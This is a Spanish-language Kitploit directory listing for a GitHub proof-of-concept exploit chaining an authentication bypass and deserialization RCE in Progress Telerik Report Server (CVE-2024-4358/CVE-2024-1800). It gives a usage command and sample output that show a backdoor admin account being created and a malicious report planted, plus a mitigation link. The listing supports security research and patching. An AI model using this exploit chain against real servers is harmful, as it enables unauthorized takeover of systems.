Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-4358 — Cadena de RCE preautenticada en Progress Telerik Report Server (CVE-2024-4358/CVE-2024-1800) | Kitploit
Herramientas/GitHubGitHub/sinsinology/cve-2024-4358
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAutenticaciónDesarrollo de Payloads
GitHubsinsinology/cve-2024-4358

CVE-2024-4358

Cadena de RCE preautenticada en Progress Telerik Report Server (CVE-2024-4358/CVE-2024-1800)

Ver Repositorio
7915hace 2 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-4358 / CVE-2024-1800

Cadena de explotación de deserialización y omisión de autenticación en Telerik Report Server para CVE-2024-4358/CVE-2024-1800

Análisis técnico

Un análisis de causa raíz de la vulnerabilidad se encuentra en mi blog poc

Resumen

¿Versiones compatibles?

Básicamente todas en el momento en que se publicó el exploit; para futuras referencias, todas las versiones mayores/menores en la lista siguiente:

root@kitploit:~
2012
2017
2018
2019
2020
2021
2022
2023
2024

Uso

root@kitploit:~
python CVE-2024-4358.py --target http://192.168.253.128:83 -c "whoami"

(^_^) Progress Telerik Report Server pre-authenticated RCE (CVE-2024-4358/CVE-2024-1800) || Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam)
(*) random backdoor username: oelycslyun
(*) random backdoor password: cqgnacxljo
(*) Attempting to bypass authentication
(+) Authentication bypass was successful, backdoor account created
(+) Saving credentials to credentials.txt
(+) Successfully authenticated as oelycslyun with password cqgnacxljo
(*) got token: zfCch_LNv0PyKfe7eBDYKXV70IOotwNQ2p82aX-JHIMCisVnTW9PWWYUKljhcRw5alubNOg_gXoHT6-hJk4VO-jGZuzmisLIi5A
(*) Generated random report name: qvwdycugmc
(*) Creating malicious report under name qvwdycugmc
(*) Deserialization exploit finished

Mitigaciones

Actualice a la última versión o mitigue siguiendo las instrucciones del aviso de Progress.

  • https://docs.telerik.com/report-server/knowledge-base/registration-auth-bypass-cve-2024-4358

Síguenos en Twitter para conocer las últimas investigaciones de seguridad:

  • SinSinology
  • SummoningTeam

Aviso de responsabilidad

Este software ha sido creado exclusivamente con fines de investigación académica y para el desarrollo de técnicas de defensa efectivas, y no está diseñado para ser utilizado para atacar sistemas excepto cuando se haya autorizado explícitamente. Los mantenedores del proyecto no son responsables del uso indebido del software. Úselo con responsabilidad.

Descargar herramienta